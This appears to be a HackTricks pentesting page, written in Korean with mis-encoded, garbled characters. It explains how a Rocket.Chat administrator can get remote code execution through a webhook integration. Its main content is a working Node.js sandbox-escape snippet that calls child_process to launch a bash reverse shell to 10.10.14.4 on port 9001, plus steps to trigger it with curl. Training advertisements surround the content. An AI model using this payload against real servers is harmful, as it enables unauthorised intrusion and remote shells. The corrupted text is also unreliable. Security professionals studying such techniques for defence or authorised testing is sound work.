๋กœ์ผ“ ์ฑ—

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

RCE

๋กœ์ผ“ ์ฑ—์—์„œ ๊ด€๋ฆฌ์ž์ธ ๊ฒฝ์šฐ RCE๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  • **Integrations**๋กœ ๊ฐ€์„œ **New Integration**์„ ์„ ํƒํ•˜๊ณ  Incoming WebHook ๋˜๋Š” Outgoing WebHook ์ค‘ ํ•˜๋‚˜๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.
  • /admin/integrations/incoming
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • WebHook์„ ๊ตฌ์„ฑํ•ฉ๋‹ˆ๋‹ค (์ฑ„๋„๊ณผ ์‚ฌ์šฉ์ž ์ด๋ฆ„์œผ๋กœ ๊ฒŒ์‹œ๋ฌผ์ด ์กด์žฌํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค):
  • WebHook ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๊ตฌ์„ฑํ•ฉ๋‹ˆ๋‹ค:
  • ๋ณ€๊ฒฝ ์‚ฌํ•ญ ์ €์žฅ
  • ์ƒ์„ฑ๋œ WebHook URL์„ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค:
  • curl๋กœ ํ˜ธ์ถœํ•˜๋ฉด rev shell์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ